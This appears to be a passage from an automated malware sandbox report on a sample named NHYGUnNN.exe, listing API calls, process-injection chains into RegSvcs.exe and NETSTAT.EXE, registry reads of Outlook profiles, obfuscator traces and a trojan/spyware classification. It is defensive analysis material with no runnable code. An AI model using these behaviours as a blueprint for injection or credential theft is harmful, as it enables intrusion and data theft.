      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C20A8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B090
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C28EC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C2B28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AB40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139CB4F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132EBB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132138B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A23E3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B03DA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BDBD2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132ABD8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFA2B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C22AE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F0D20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C2D07
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C1D55
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C25DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130841F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BD466
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C1FF1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013CDFCE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01316E30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BD616
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C2EF7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004012A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409ACC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040B467
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004044C7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0042257F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004046E7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040FE97
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BAB40
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03662B28
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CABD8
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365DBD2
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036503DA
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CEBB0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0364FA2B
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036622AE
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359F900
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B99BF
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0366E824
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03651002
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA830
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036628EC
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035AB090
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036620A8
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C20A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03661FF1
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0366DFCE
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B6E30
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365D616
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03662EF7
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03661D55
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03662D07
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03590D20
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035AD5E0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036625DD
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C2581
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365D466
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035A841F
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC88B0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BCE760
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC2D90
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC9D30
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BE0E48
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC2FB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 012FB150 appears 136 times
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0359B150 appears 87 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013399A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013398F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013395D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013397A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013396E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339950 NtQueueApcThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013399D0 NtCreateProcessEx,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339820 NtEnumerateKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133B040 NtSuspendThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013398A0 NtWriteVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339B00 NtSetValueKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A3B0 NtGetContextThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A10 NtQuerySection,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A80 NtOpenDirectoryObject,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133AD30 NtSetContextThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339520 NtWaitForSingleObject,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339560 NtWriteFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013395F0 NtQueryInformationFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339730 NtQueryVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A710 NtOpenProcessToken,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A770 NtOpenThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339770 NtSetInformationFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339760 NtOpenProcess,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339610 NtEnumerateValueKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339670 NtQueryInformationProcess,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339650 NtQueryValueKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013396D0 NtCreateKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E087 NtAllocateVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004012A4 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DEA7 NtCreateFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DF57 NtReadFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DFD7 NtClose,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E083 NtAllocateVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004014E9 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DEA1 NtCreateFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DFD1 NtClose,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9610 NtEnumerateValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9560 NtWriteFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D95D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC8A0 NtClose,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC820 NtReadFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC870 NtDeleteFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC950 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC770 NtCreateFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC89A NtClose,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC8CA NtDeleteFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC94C NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC76A NtCreateFile,
      Source: NHYGUnNN.exeStatic PE information: No import functions for PE file found
      Source: NHYGUnNN.exe, 00000000.00000002.237146160.0000012A25D66000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.237199303.0000012A25EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
      Source: NHYGUnNN.exeBinary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
      Source: NHYGUnNN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: NHYGUnNN.exeReversingLabs: Detection: 27%
      Source: NHYGUnNN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\NHYGUnNN.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\NHYGUnNN.exe C:\Users\user\Desktop\NHYGUnNN.exe
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
      Source: C:\Windows\SysWOW64\NETSTAT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
      Source: C:\Users\user\Desktop\NHYGUnNN.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NHYGUnNN.exe.logJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile created: C:\Users\user\AppData\Local\Temp\1--Lt08NNJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@6/6
      Source: NHYGUnNN.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
      Source: C:\Users\user\Desktop\NHYGUnNN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: NHYGUnNN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: NHYGUnNN.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: NHYGUnNN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: NHYGUnNN.exe, A/cb0864eb24eeeb94488d89ba2673ea289.cs.Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.2.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs.Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.0.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs.Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\NHYGUnNN.exeCode function: 0_2_0000012A25D250CF push rdx; ret
      Source: C:\Users\user\Desktop\NHYGUnNN.exeCode function: 0_2_00007FFCA43F417B push edx; ret
      Source: C:\Users\user\Desktop\NHYGUnNN.exeCode function: 0_2_00007FFCA43F4185 push edx; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0134D0D1 push ecx; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004210E9 push eax; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004210F2 push eax; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0042109C push eax; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00421153 push eax; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E901 push ebp; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00405A1E push ecx; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004172D0 push edx; retf
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040A2E4 push ecx; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409B74 push ecx; retf
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408BAF push cx; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409CB7 push cs; retf
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041A528 push ebp; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004085F9 pushfd ; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040CF66 push cs; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041AFA7 push ecx; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035ED0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BCB82F push cs; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BD9870 push ecx; ret
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDF9BB push eax; ret
